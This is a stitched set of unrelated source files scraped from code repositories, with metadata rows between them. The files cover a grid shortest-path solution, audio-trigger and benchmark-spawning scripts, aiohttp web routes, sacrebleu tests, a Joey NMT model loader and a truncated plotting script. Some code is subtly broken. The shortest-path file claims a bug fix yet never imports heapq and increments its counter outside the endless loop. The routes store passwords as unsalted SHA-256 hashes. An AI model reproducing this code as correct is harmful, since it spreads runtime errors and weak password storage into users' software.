# BOJ 4485: minimum-cost path from (0,0) to (N-1,N-1) on an N x N grid.
# BUG FIX: the original seeded costs with 999, which is below the worst-case
# path cost (up to N*N*9 for N=125), producing wrong answers on large inputs;
# it also set visited[0][0] repeatedly while never marking other cells.
# Replaced with a standard Dijkstra over the grid.
idx = 1
while True:
    N = int(input())
    if N == 0:
        exit()
    arr = [list(map(int, input().split())) for _ in range(N)]
    INF = float('inf')
    dist = [[INF] * N for _ in range(N)]
    dist[0][0] = arr[0][0]
    heap = [(arr[0][0], 0, 0)]
    while heap:
        d, x, y = heapq.heappop(heap)
        if d > dist[x][y]:  # stale queue entry
            continue
        for dx, dy in ((-1, 0), (1, 0), (0, -1), (0, 1)):  # up/down/left/right
            nx, ny = x + dx, y + dy
            if 0 <= nx < N and 0 <= ny < N and dist[nx][ny] > d + arr[nx][ny]:
                dist[nx][ny] = d + arr[nx][ny]
                heapq.heappush(heap, (dist[nx][ny], nx, ny))
    print(f'Problem {idx}: {dist[N-1][N-1]}')
idx += 1 | hyojeong00/BOJ | boj4485.py | boj4485.py | py | 796 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "collections.deque",
"line_number": 13,
"usage_type": "call"
}
] |
805703677 | import pyaudio
import numpy as np
import math
import struct
import simpleaudio as sa
from imutils.video import FPS
#CHUNK = 1024
CHUNK = 1024  # frames per capture buffer
FORMAT = pyaudio.paInt16  # 16-bit signed input samples
CHANNELS = 2
RATE = 44100  # capture sample rate, Hz
RECORD_SECONDS = 0.03  # length of each energy-measurement window
print(int(RATE / CHUNK * RECORD_SECONDS))
volume = 0.1  # range [0.0, 1.0]
fs = 44100  # sampling rate, Hz, must be integer
duration = 0.3  # in seconds, may be float
f = 750.0  # sine frequency, Hz, may be float
fps = FPS().start()
def rms(data):
    """Root-mean-square amplitude of a buffer of 16-bit PCM samples,
    normalized to [0, 1] by the int16 full scale (32768).

    Returns 0 for an empty buffer (or the `[]` placeholder used on read
    errors).  BUG FIX: the original only special-cased `[]`, so an empty
    bytes object (b"") fell through and raised ZeroDivisionError.
    """
    if not data:
        return 0
    count = len(data) // 2  # two bytes per int16 sample
    samples = struct.unpack("%dh" % count, data)
    sum_squares = sum((sample * (1.0 / 32768)) ** 2 for sample in samples)
    return math.sqrt(sum_squares / count)
# Capture loop: listen on the mic in short windows and, when the measured RMS
# energy crosses a threshold, play a sine burst whose volume scales with the
# detected energy (a simple "virtual drum" trigger).
p = pyaudio.PyAudio()
p2 = pyaudio.PyAudio()
stream = p.open(format=FORMAT,
                channels=CHANNELS,
                rate=RATE,
                input=True,
                frames_per_buffer=CHUNK)
# for paFloat32 sample values must be in range [-1.0, 1.0]
streamout = p2.open(format=pyaudio.paFloat32,
                    channels=1,
                    rate=fs,
                    output=True)
# generate samples, note conversion to float32 array
samples = (np.sin(2*np.pi*np.arange(fs*duration)*f/fs)).astype(np.float32)
wave_obj = sa.WaveObject.from_wave_file("bumbo.wav")
ind = 0
count = 0
# Run 500 measurement windows, then report timing statistics.
while ind != 500:
    frames = []
    energy = []
    for _ in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
        try:
            data = stream.read(CHUNK, exception_on_overflow=False)
        except IOError:
            #data = '\x00' * CHUNK
            data = []
        energy.append(rms(data))
    # Trigger only above the energy threshold and after a >10-window cooldown.
    if np.mean(energy) > 0.01 and count > 10:
        #wave_obj.play()
        streamout.get_write_available()
        #streamout.write(samples * np.mean(energy)/0.2)
        streamout.write(samples * (volume + np.mean(energy) * 5))
        print(np.mean(energy))
        # energy = 0.02 - volume = 0.1
        # energy = 0.2 - volume = 1
        count = 0
    else:
        count = count + 1
    ind = ind + 1
    fps.update()
# stop the timer and display FPS information
fps.stop()
print("[INFO] elapsed time: {:.2f}".format(fps.elapsed()))
print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
#energy = np.mean(energy)
#print("Average energy in an execution of " + str(RECORD_SECONDS*ind) + " Seconds: " + str(energy))
stream.stop_stream()
stream.close()
streamout.stop_stream()
streamout.close()
p.terminate()
p2.terminate()
| matheusbitaraes/VirtualDrum | hearaudio.py | hearaudio.py | py | 2,534 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pyaudio.paInt16",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "imutils.video.FPS",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "struct.unpack",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "math.sqrt",
... |
11548425803 | import hashlib
import time
import utils
import asyncpg
import asyncpg.exceptions as asyncpg_exc
from config import logger
from aiohttp import web
from db_wrapper import DbWrapper
router = web.RouteTableDef()
@router.post('/sign_in')
async def sign_in(request: web.Request):
    """Authenticate a user by email/password and return their access token.

    403 for an unknown email or a wrong password; 200 with
    {'token', 'timestamp', 'lifetime'} in the response data on success.
    """
    body = await request.json()
    email: str = body.get('email')
    password: str = body.get('password')
    # Passwords are stored as hex SHA-256 digests (see sign_up).
    # SECURITY NOTE: unsalted SHA-256 is weak for password storage; consider a
    # dedicated KDF (this would require a coordinated storage migration).
    # FIX: renamed local from `hash`, which shadowed the builtin.
    password_hash = hashlib.sha256(password.encode('UTF-8')).hexdigest()
    user_data = await DbWrapper().get_user_data_by_email(email)
    if not user_data:
        return web.json_response(utils.generate_response(0, 'No account with such email'), status=403)
    if password_hash != user_data['hash']:
        return web.json_response(utils.generate_response(0, 'Incorrect password'), status=403)
    response = utils.generate_response(1, 'Authorization_successful')
    token = await DbWrapper().get_token(user_data['user_id'])
    response['data'].update({'token': token['tkn'], 'timestamp': token['timestamp'], 'lifetime': token['lifetime']})
    return web.json_response(response, status=200)
@router.post('/sign_up')
async def sign_up(request: web.Request):
    """Register a new account and issue its initial token.

    Returns a success/failure payload; duplicate emails (including the
    concurrent-request race) report 'Account already exists'.
    """
    body = await request.json()
    firstname: str = body.get('firstname')
    lastname: str = body.get('lastname')
    mail: str = body.get('email')
    password: str = body.get('password')
    # NOTE(review): unsalted SHA-256 password hashing -- weak; matches sign_in.
    pw_hash = hashlib.sha256(password.encode('utf-8')).hexdigest()
    try:
        user_by_email = await DbWrapper().get_user_data_by_email(mail)
        if user_by_email:
            return web.json_response(utils.generate_response(0, 'Account already exists'))
        user_insert_result = await DbWrapper().insert_user(firstname=firstname, lastname=lastname, email=mail, password_hash=pw_hash, timestamp=int(time.time()))
        # this is here because sometimes it's possible for two identical requests happening at the same time
        # causing an error due to none being inserted, as insert_user returns none because in another instance of this
        # handler being run it has already been added
        if user_insert_result:
            token = utils.generate_token()
            await DbWrapper().insert_token(user_insert_result, token, int(time.time()), 0)
            return web.json_response(utils.generate_response(1, 'Account created successfully'))
        else:
            return web.json_response(utils.generate_response(0, 'Account already exists'))
    except Exception as e:
        logger.warning(f'[Route Handlers] {e}, lineno:{e.__traceback__.tb_lineno}')
        # this will send a 500 response code
        raise
@router.get('/sessions')
async def all_sessions(request: web.Request):
    """List every session together with its instructor's specializations."""
    result = await DbWrapper().get_all_sessions()
    response = utils.generate_response(1, 'Session list returned')
    response['data'].update({'sessions':[]})
    for session in result:
        # One extra query per session (N+1 pattern) to fetch specializations.
        specializations = await DbWrapper().get_instructor_specs(session['instructor_id'])
        response['data']['sessions'].append({
            'session_id': session['session_id'],
            'session_start': session['session_start'],
            'session_place': session['session_place'],
            'session_name': session['session_name'],
            'capacity': session['capacity'],
            'signed_up': session['signed_up'],
            'firstname': session['firstname'],
            'lastname': session['lastname'],
            'specialization': [record['spec_name'] for record in specializations]
        })
    return web.json_response(response, status=200)
@router.post('/sign_up_for_session')
async def sign_for_session(request:web.Request):
    """Sign the requesting user (X-User-Id header) up for one session.

    400 on a duplicate signup (unique-constraint violation), 500 on any
    other DB error, 200 on success.
    """
    body = await request.json()
    session_id = body.get('session_id')
    uid = request.headers.get('X-User-Id')
    try:
        await DbWrapper().sign_up_for_session(user_id=uid, session_id=session_id)
    except asyncpg_exc.UniqueViolationError as e:
        # The (user, session) pair already exists -> double signup.
        return web.json_response(utils.generate_response(0, 'Double signup attempt'), status=400)
    except Exception as e:
        return web.json_response(utils.generate_response(0, f'Something went wrong. {e}'), status=500)
    return web.json_response(utils.generate_response(1, 'Success'), status=200)
@router.post('/unsign_from_session')
async def unsign_for_session(request: web.Request):
    """Remove the requesting user's (X-User-Id header) signup for one session."""
    payload = await request.json()
    sid = int(payload.get('session_id'))
    user = request.headers['X-User-Id']
    await DbWrapper().unsign_from_session(session_id=sid, user_id=user)
    return web.Response(status=200)
@router.get('/instructors')
async def get_instructors(request: web.Request):
    """List every instructor with name, bio info and specialization."""
    rows = await DbWrapper().get_instructors()
    response = utils.generate_response(1, 'Instructor list returned')
    response['data'].update({'instructors': [
        {
            'firstname': row['firstname'],
            'lastname': row['lastname'],
            'info': row['info'],
            'spec': row['spec_name'],
        }
        for row in rows
    ]})
    return web.json_response(response, status=200)
@router.post('/sessions_by_uid')
async def get_sessions_by_uid(request: web.Request):
    """List the sessions the requesting user (X-User-Id header) is signed up for."""
    # NOTE(review): the parsed body is never used; the request must still carry
    # valid JSON or request.json() raises.
    body = await request.json()
    uid = int(request.headers['X-User-Id'])
    result = await DbWrapper().get_sessions_by_user(uid)
    response = utils.generate_response(1, 'Session list returned')
    response['data'].update({'sessions': []})
    for session in result:
        # One extra query per session (N+1 pattern) to fetch specializations.
        specializations = await DbWrapper().get_instructor_specs(session['instructor_id'])
        response['data']['sessions'].append({
            'session_id': session['session_id'],
            'session_start': session['session_start'],
            'session_place': session['session_place'],
            'session_name': session['session_name'],
            'capacity': session['capacity'],
            'signed_up': session['signed_up'],
            'firstname': session['firstname'],
            'lastname': session['lastname'],
            'specialization': [record['spec_name'] for record in specializations]
        })
    return web.json_response(response, status=200)
@router.get('/get_notifications_by_uid')
async def get_notifications_by_uid(request: web.Request):
    """Return the notifications bound to the requesting user (X-User-Id header)."""
    uid = request.headers['X-User-Id']
    notifications = await DbWrapper().get_notifications_by_user_id(uid)
    data = []
    for notification in notifications:
        # BUG FIX: the original built this dict but appended an undefined name
        # (`notification_data`), which raised NameError at runtime.
        data.append({
            'notification_id': notification['notification_id'],
            'text': notification['text']
        })
    # BUG FIX: generate_response was called unqualified (NameError); qualify it
    # with utils like every other handler, and return the wrapped response
    # instead of the bare data list.
    response = utils.generate_response(1, 'Success')
    response['data'] = data
    return web.json_response(response, status=200)
@router.delete('/delete_notification_link')
async def soft_delete_notification_link(request: web.Request):
    """Unbind one notification from the requesting user (X-User-Id header)."""
    body = await request.json()
    # BUG FIX: read the same header every other handler uses ('X-User-Id');
    # the original looked up 'user_id'.
    user_id = request.headers['X-User-Id']
    notification_id = body['notification_id']
    try:
        await DbWrapper().unbind_notification(int(user_id), int(notification_id))
    except Exception:
        logger.exception('Exception during delete_notification_link:')
        # BUG FIX: aiohttp's web.Response takes no positional payload argument;
        # a JSON payload belongs in web.json_response.
        return web.json_response(utils.generate_response(0, 'Failed to delete notification link'), status=500)
    # BUG FIX: the success path referenced `response`, which was only defined
    # in the except block, raising NameError on every successful delete.
    return web.json_response(utils.generate_response(1, 'Success'), status=200)
@router.get('/ping')
async def ping(request: web.Request):
    """Liveness probe: always answers with the literal body 'pong'."""
    return web.Response(body='pong')
| ilookhandsometoday/dance-studio-backend | src/routes.py | routes.py | py | 7,394 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "aiohttp.web.RouteTableDef",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "aiohttp.web",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "aiohttp.web.Request",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "aiohtt... |
36924785517 | from beewin_module.database.beewinDB import Member, Result
from beewin_module.models.dataClass import MemberData
from flask_restful import Resource, request, output_json
from common.argsParser import uid_parser, member_parser
class MemberResource(Resource):
    """Flask-RESTful CRUD endpoint for Member records.

    Every handler returns Result.to_dict() from the DB layer; POST/PUT build a
    MemberData from the parsed request arguments.
    """
    def get(self, uid):
        # 'all' is a sentinel uid: return Member.MemberLength() (presumably the
        # member count -- confirm in beewinDB) instead of a single record.
        if uid == 'all':
            res: Result = Member.MemberLength()
            return res.to_dict()
        else:
            res: Result = Member.read(uid)
            return res.to_dict()
    def post(self):
        arg = member_parser.parse_args()
        _member = MemberData.from_dict(arg)
        res: Result = Member.create(_member.uid, _member)
        return res.to_dict()
    def put(self):
        arg = member_parser.parse_args()
        _member = MemberData.from_dict(arg)
        res: Result = Member.update(_member.uid, _member)
        return res.to_dict()
    def delete(self):
        arg = uid_parser.parse_args()
        res: Result = Member.delete(arg['uid'])
        return res.to_dict()
# No standalone behavior; this module is imported by the API application.
if __name__ == '__main__':
    pass
| Yicheng-1218/web_module | beewin_api/resource/MemberResource.py | MemberResource.py | py | 1,043 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask_restful.Resource",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "beewin_module.database.beewinDB.Result",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "beewin_module.database.beewinDB.Member.MemberLength",
"line_number": 11,
"us... |
41060932108 | import pytest
import sacrebleu
# Absolute tolerance used when comparing computed chrF scores to the
# pre-computed expected values below.
EPSILON = 1e-4
# Sentence-level cases: (hypothesis, [references], expected chrF score).
test_sentence_level_chrf = [
    (
        'Co nás nejvíc trápí, protože lékaři si vybírají, kdo bude žít a kdo zemře.',
        ['Nejvíce smutní jsme z toho, že musíme rozhodovat o tom, kdo bude žít a kdo zemře.'],
        39.14078509,
    ),
    (
        'Nebo prostě nemají vybavení, které by jim pomohlo, uvedli lékaři.',
        ['A někdy nemáme ani potřebný materiál, abychom jim pomohli, popsali lékaři.'],
        31.22557079,
    ),
    (
        'Lapali po dechu, jejich životy skončily dřív, než skutečně začaly.',
        ['Lapali po dechu a pak jejich život skončil - dřív, než skutečně mohl začít, připomněli.'],
        57.15704367,
    ),
]
# hypothesis, reference, expected score
# >= 2.0.0: some orders are not fulfilled in epsilon smoothing (chrF++.py and NLTK)
test_cases = [
    (["abcdefg"], ["hijklmnop"], 0.0),
    (["a"], ["b"], 0.0),
    ([""], ["b"], 0.0),
    ([""], ["ref"], 0.0),
    ([""], ["reference"], 0.0),
    (["aa"], ["ab"], 8.3333),
    (["a", "b"], ["a", "c"], 8.3333),
    (["a"], ["a"], 16.6667),
    (["a b c"], ["a b c"], 50.0),
    (["a b c"], ["abc"], 50.0),
    ([" risk assessment must be made of those who are qualified and expertise in the sector - these are the scientists ."],
     ["risk assessment has to be undertaken by those who are qualified and expert in that area - that is the scientists ."], 63.361730),
    ([" Die Beziehung zwischen Obama und Netanjahu ist nicht gerade freundlich. "],
     ["Das Verhältnis zwischen Obama und Netanyahu ist nicht gerade freundschaftlich."], 64.1302698),
    (["Niemand hat die Absicht, eine Mauer zu errichten"], ["Niemand hat die Absicht, eine Mauer zu errichten"], 100.0),
]
# sacreBLEU < 2.0.0 mode
# hypothesis, reference, expected score
test_cases_effective_order = [
    (["a"], ["a"], 100.0),
    ([""], ["reference"], 0.0),
    (["a b c"], ["a b c"], 100.0),
    (["a b c"], ["abc"], 100.0),
    ([""], ["c"], 0.0),
    (["a", "b"], ["a", "c"], 50.0),
    (["aa"], ["ab"], 25.0),
]
# Cases checked with remove_whitespace=False (whitespace kept in n-grams).
test_cases_keep_whitespace = [
    (
        ["Die Beziehung zwischen Obama und Netanjahu ist nicht gerade freundlich."],
        ["Das Verhältnis zwischen Obama und Netanyahu ist nicht gerade freundschaftlich."],
        67.3481606,
    ),
    (
        ["risk assessment must be made of those who are qualified and expertise in the sector - these are the scientists ."],
        ["risk assessment has to be undertaken by those who are qualified and expert in that area - that is the scientists ."],
        65.2414427,
    ),
]
@pytest.mark.parametrize("hypotheses, references, expected_score", test_cases)
def test_chrf(hypotheses, references, expected_score):
    """Corpus chrF with epsilon smoothing reproduces the reference scores."""
    result = sacrebleu.corpus_chrf(
        hypotheses, [references],
        char_order=6, word_order=0, beta=3, eps_smoothing=True,
    )
    assert abs(result.score - expected_score) < EPSILON
@pytest.mark.parametrize("hypotheses, references, expected_score", test_cases_effective_order)
def test_chrf_eff_order(hypotheses, references, expected_score):
    """Corpus chrF without epsilon smoothing (pre-2.0 effective-order mode)."""
    result = sacrebleu.corpus_chrf(
        hypotheses, [references],
        char_order=6, word_order=0, beta=3, eps_smoothing=False,
    )
    assert abs(result.score - expected_score) < EPSILON
@pytest.mark.parametrize("hypotheses, references, expected_score", test_cases_keep_whitespace)
def test_chrf_keep_whitespace(hypotheses, references, expected_score):
    """Corpus chrF with whitespace retained in the n-gram statistics."""
    result = sacrebleu.corpus_chrf(
        hypotheses, [references],
        char_order=6, word_order=0, beta=3, remove_whitespace=False,
    )
    assert abs(result.score - expected_score) < EPSILON
@pytest.mark.parametrize("hypothesis, references, expected_score", test_sentence_level_chrf)
def test_chrf_sentence_level(hypothesis, references, expected_score):
    """Sentence-level chrF with epsilon smoothing matches reference scores."""
    result = sacrebleu.sentence_chrf(hypothesis, references, eps_smoothing=True)
    assert abs(result.score - expected_score) < EPSILON
| mjpost/sacrebleu | test/test_chrf.py | test_chrf.py | py | 3,965 | python | en | code | 896 | github-code | 1 | [
{
"api_name": "sacrebleu.corpus_chrf",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "pytest.mark.parametrize",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "pytest.mark",
"line_number": 71,
"usage_type": "attribute"
},
{
"api_name": "sacreb... |
27768711368 | import numpy as np
import itertools
import multiprocessing
import threading
import subprocess
import time
import sys
import os
# Command-line interface: output data folder + number of worker threads.
if len(sys.argv) != 3:
    print("input data_folder thread_num")
    exit(0)
folder = sys.argv[1]
max_spawn = int(sys.argv[2])
# Create the output folder if needed and run everything inside it.
if not os.path.exists(folder):
    os.mkdir(folder)
os.chdir(folder)
# Pick the benchmark binary for the current platform (relative to `folder`).
if os.name == "nt":
    proc = "../bin/throughput.exe"
else:
    proc = "../bin/throughput.out"
task_list = []
# Parameter grid for the benchmark runs.
width = [7]
n_inst = [10000]
trial = [10]
ano_prob = [0] + list(np.logspace(-6,-4, 20))
ano_life = [100, 1000]
# Cartesian product of all parameters; each task becomes a list of string
# arguments ready to be passed to the subprocess.
task_list = itertools.product(width, n_inst, trial, ano_prob, ano_life)
task_list = list(task_list)
task_list = [list(map(str, val)) for val in task_list]
print(task_list)
# Repeat the whole grid many times to gather statistics.
task_list = task_list * 1000
print("max_spawn = ", max_spawn)
# Shared work-queue state: task_index is the next unclaimed task, guarded
# by task_lock.
task_lock = threading.Lock()
task_index = 0
def spawn_and_wait(thread_id):
    """Worker loop: repeatedly claim the next task index under the shared
    lock and run the benchmark binary for it until the list is exhausted.

    Each worker writes its results to its own file (result<thread_id>.txt),
    so concurrent runs never collide on output.
    """
    global task_list
    global task_lock
    global task_index
    while True:
        claimed = None
        with task_lock:
            if task_index < len(task_list):
                claimed = task_index
                task_index += 1
        if claimed is None:
            print("thread{:2} exits".format(thread_id))
            return
        fname = "result{}.txt".format(thread_id)
        arg = [proc, fname] + task_list[claimed]
        print(arg)
        process = subprocess.Popen(arg)
        start = time.time()
        print("thread{:2} : start task {}: {}".format(thread_id, claimed, arg))
        process.wait()
        elapsed = time.time() - start
        print("thread{:2} : finish task {}: elp:{}".format(thread_id, claimed, elapsed))
# Spawn one worker thread per requested slot, then wait for all to finish.
thread_pool = [
    threading.Thread(target=spawn_and_wait, args=[worker_id])
    for worker_id in range(max_spawn)
]
for worker in thread_pool:
    worker.start()
for worker in thread_pool:
    worker.join()
| kodack64/Q3DE | fig10_q3de_throughput/micro_spawn.py | micro_spawn.py | py | 2,178 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "sys.argv",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_... |
10663386137 | import os, yaml, logging, re
# external imports
import torch
from joeynmt.helpers import load_config
from subword_nmt import apply_bpe
from subword_nmt import apply_bpe
from sacremoses import MosesTokenizer, MosesDetokenizer
from joeynmt.helpers import load_config, get_latest_checkpoint, \
load_checkpoint
from joeynmt.vocabulary import build_vocab
from joeynmt.model import build_model
from joeynmt.prediction import validate_on_data
from urllib.request import urlopen
from io import BytesIO
from zipfile import ZipFile
# internal imports
from core.utils import load_line_as_data
class MasakhaneModelLoader():
    """Manages download and loading of Masakhane Joey NMT translation models."""
    def __init__(self, available_models_file):
        # Cache directory for downloaded models (overridable via MODEL env var).
        self._model_dir_prefix = os.environ.get('MODEL',
                                                "./models/joeynmt/")
        self._src_language = ''
        # load available models into memory
        self.models = self.load_available_models(available_models_file)
    def load_available_models(self, available_models_file):
        """Load a dictionary of available models from a tab-separated file.

        The first row supplies the column headers.  Rows whose 'complete'
        column is not 'yes' are skipped.  Keys have the form
        '<src_language>-<tgt_language>-<domain>'.
        """
        models = {}
        with open(available_models_file, 'r') as ofile:
            # iterate over file entries
            for i, line in enumerate(ofile):
                entries = line.strip().split("\t")
                # extract headers
                if i == 0:
                    header_keys = [str(h) for h in entries]
                    continue
                # build available model dictionary from the headers & entries
                model = {key: value for key, value in zip(header_keys, entries)}
                # don't add incomplete models
                if model['complete'] != 'yes':
                    continue
                models[f"{model['src_language']}-{model['tgt_language']}-{model['domain']}"] = model
        print('Found {} Masakhane models.'.format(len(models)))
        return models
    def download_model(self, src_language, tgt_language, domain):
        """Download (if needed) and configure the model for the given pair/domain."""
        model_dir = f"{self._model_dir_prefix}{src_language}-{tgt_language}-{domain}"
        if not os.path.exists(model_dir):
            os.system(f'mkdir -p {model_dir}')
        # Raises KeyError for unknown models -- the lookup doubles as
        # validation even though the value is not used further.
        model_files = self.models[f"{src_language}-{tgt_language}-{domain}"]
        # Paths of all files a complete local model must provide.
        ckpt_path = os.path.join(model_dir, 'model.ckpt')
        src_vocab_path = os.path.join(model_dir, 'src_vocab.txt')
        trg_vocab_path = os.path.join(model_dir, 'trg_vocab.txt')
        config_path = os.path.join(model_dir, 'config_orig.yaml')
        src_bpe_path = os.path.join(model_dir, 'src.bpe.model')
        trg_bpe_path = os.path.join(model_dir, 'trg.bpe.model')
        required_files = [ckpt_path, src_vocab_path, trg_vocab_path,
                          config_path, src_bpe_path, trg_bpe_path]
        # BUG FIX: the original condition was
        # `if not os.path.exists in [...]`, which tests membership of the
        # *function object* in the list (always False) and therefore
        # re-downloaded the archive on every call.  Download only when at
        # least one required file is missing.
        if not all(os.path.exists(path) for path in required_files):
            URL = "https://zenodo.org/record/7636723/files/" + \
                src_language + "-" + tgt_language
            if domain == "":
                URL += "-baseline.zip?download=1"
            else:
                URL += "-" + domain + "-baseline.zip?download=1"
            http_response = urlopen(URL)
            zipfile = ZipFile(BytesIO(http_response.read()))
            zipfile.extractall(path=model_dir)
            # Rename config file to config_orig.yaml.  This must happen only
            # right after extraction: on later calls config.yaml has already
            # been renamed/rewritten and the rename would fail.
            os.rename(os.path.join(model_dir, 'config.yaml'), config_path)
        # Adjust config.
        config = load_config(config_path)
        new_config_file = os.path.join(model_dir, 'config.yaml')
        config = self._update_config(config, src_vocab_path, trg_vocab_path,
                                     model_dir, ckpt_path)
        with open(new_config_file, 'w') as cfile:
            yaml.dump(config, cfile)
        print('Downloaded model for {}-{}.'.format(src_language, tgt_language))
    def load_model(self, src_language, tgt_language, domain, bpe_src_code=None, tokenize=None):
        """Load a local model and return a configuration dict.

        The returned dict contains the built Joey NMT model, vocabularies,
        decoding parameters and pre/post-processing callables under the keys
        used by the translation pipeline ('model', 'src_vocab', 'trg_vocab',
        'beam_size', 'preprocess', 'postprocess', ...).
        """
        model_dir = f"{self._model_dir_prefix}{src_language}-{tgt_language}-{domain}"
        ckpt_path = os.path.join(model_dir, 'model.ckpt')
        src_vocab_path = os.path.join(model_dir, 'src_vocab.txt')
        trg_vocab_path = os.path.join(model_dir, 'trg_vocab.txt')
        config_path = os.path.join(model_dir, 'config_orig.yaml')
        # Adjust config.
        config = load_config(config_path)
        new_config_file = os.path.join(model_dir, 'config.yaml')
        config = self._update_config(config, src_vocab_path, trg_vocab_path,
                                     model_dir, ckpt_path)
        with open(new_config_file, 'w') as cfile:
            yaml.dump(config, cfile)
        print('Loaded model for {}-{}.'.format(src_language, tgt_language))
        conf = {}
        logger = logging.getLogger(__name__)
        conf["logger"] = logger
        # load the Joey configuration
        cfg = load_config(new_config_file)
        # load the checkpoint
        if "load_model" in cfg['training'].keys():
            ckpt = cfg['training']["load_model"]
        else:
            ckpt = get_latest_checkpoint(model_dir)
        if ckpt is None:
            raise FileNotFoundError("No checkpoint found in directory {}."
                                    .format(model_dir))
        # prediction parameters from config
        conf["use_cuda"] = cfg["training"].get(
            "use_cuda", False) if torch.cuda.is_available() else False
        conf["level"] = cfg["data"]["level"]
        conf["max_output_length"] = cfg["training"].get(
            "max_output_length", None)
        conf["lowercase"] = cfg["data"].get("lowercase", False)
        # load the vocabularies
        src_vocab_file = cfg["training"]["model_dir"] + "/src_vocab.txt"
        trg_vocab_file = cfg["training"]["model_dir"] + "/trg_vocab.txt"
        conf["src_vocab"] = build_vocab(field="src", vocab_file=src_vocab_file,
                                        dataset=None, max_size=-1, min_freq=0)
        conf["trg_vocab"] = build_vocab(field="trg", vocab_file=trg_vocab_file,
                                        dataset=None, max_size=-1, min_freq=0)
        # whether to use beam search for decoding, 0: greedy decoding
        if "testing" in cfg.keys():
            conf["beam_size"] = cfg["testing"].get("beam_size", 0)
            conf["beam_alpha"] = cfg["testing"].get("alpha", -1)
        else:
            conf["beam_size"] = 1
            conf["beam_alpha"] = -1
        # pre-processing
        if tokenize is not None:
            src_tokenizer = MosesTokenizer(lang=cfg["data"]["src"])
            trg_tokenizer = MosesDetokenizer(lang=cfg["data"]["trg"])
            # tokenize input
            def tokenizer(x): return src_tokenizer.tokenize(x, return_str=True)
            def detokenizer(x): return trg_tokenizer.detokenize(
                x.split(), return_str=True)
        else:
            def tokenizer(x): return x
            def detokenizer(x): return x
        # BUG FIX: the original referenced an undefined name `level` here,
        # raising NameError whenever bpe_src_code was supplied; the intended
        # value is the configured subword level stored in conf["level"].
        if bpe_src_code is not None and conf["level"] == "bpe":
            # load bpe merge file
            merge_file = open(bpe_src_code, "r")
            bpe = apply_bpe.BPE(codes=merge_file)
            def segmenter(x): return bpe.process_line(x.strip())
        elif conf["level"] == "char":
            # split to chars
            def segmenter(x): return list(x.strip())
        else:
            def segmenter(x): return x.strip()
        conf["preprocess"] = [tokenizer, segmenter]
        conf["postprocess"] = [detokenizer]
        # build model and load parameters into it
        model_checkpoint = load_checkpoint(ckpt, conf["use_cuda"])
        model = build_model(
            cfg["model"], src_vocab=conf["src_vocab"], trg_vocab=conf["trg_vocab"])
        model.load_state_dict(model_checkpoint["model_state"])
        if conf["use_cuda"]:
            model.cuda()
        conf["model"] = model
        print("Joey NMT model loaded successfully.")
        return conf
    def _update_config(self, config, new_src_vocab_path, new_trg_vocab_path,
                       new_model_dir, new_ckpt_path):
        """Overwrite the settings in the given config."""
        config['data']['src_vocab'] = new_src_vocab_path
        if config['model'].get('tied_embeddings', False):
            # Tied embeddings share a single vocabulary for source and target.
            config['data']['trg_vocab'] = new_src_vocab_path
        else:
            config['data']['trg_vocab'] = new_trg_vocab_path
        config['training']['model_dir'] = new_model_dir
        config['training']['load_model'] = new_ckpt_path
        return config
    def _is_lowercase(self, src_vocab_path):
        """Infer whether the model is built on lowercased data by scanning
        the source vocabulary for any upper-case entry."""
        lowercase = True
        with open(src_vocab_path, 'r') as ofile:
            for line in ofile:
                if line != line.lower():
                    lowercase = False
                    break
        return lowercase
    # Doesn't look like these functions are ever called...
    def _download_gdrive_file(self, file_id, destination):
        """Download a file from Google Drive and store in local file."""
        download_link = 'https://drive.google.com/uc?id={}'.format(file_id)
        os.system(f'gdown -q -O {destination} {download_link}')
    def _download_github_file(self, github_raw_path, destination):
        """Download a file from GitHub."""
        os.system(f'wget -q -O {destination} {github_raw_path}')
    def _download(self, url, destination):
        """Download file from Github or Googledrive."""
        try:
            if 'drive.google.com' in url:
                if url.startswith('https://drive.google.com/file'):
                    file_id = url.split("/")[-1]
                elif url.startswith('https://drive.google.com/open?'):
                    file_id = url.split('id=')[-1]
                self._download_gdrive_file(file_id, destination)
            else:
                self._download_github_file(url, destination)
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # are no longer swallowed; best-effort behaviour is preserved.
            print("Download failed, didn't recognize url {}.".format(url))
| dsfsi/masakhane-web | src/server/core/model_load.py | model_load.py | py | 10,260 | python | en | code | 34 | github-code | 1 | [
{
"api_name": "os.environ.get",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_num... |
15162386829 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
def down_sample(a):
    """Thin a 2-D sequence-of-rows: keep every 4th row (from index 3) and,
    within each kept row, every 4th element (from index 3)."""
    reduced_rows = [row[3::4] for row in a]
    return reduced_rows[3::4]
def draw_velocity(time, output_dir, data_dir):
    """Plot the layer-0 atmospheric velocity field at the given time (Ma)
    on a global map and save it to '<output_dir>/<time>Ma_velocity.png'.
    Reads raw little-endian float64 fields from '<data_dir>/bin_data'.
    """
    # NOTE(review): v/w appear to be the two horizontal velocity components
    # and h a contoured scalar field -- confirm against the data writer.
    v = np.fromfile(data_dir + '/bin_data/atm_v_time_{}_iter_n_layer_0.bin'.format(time),'<f8')
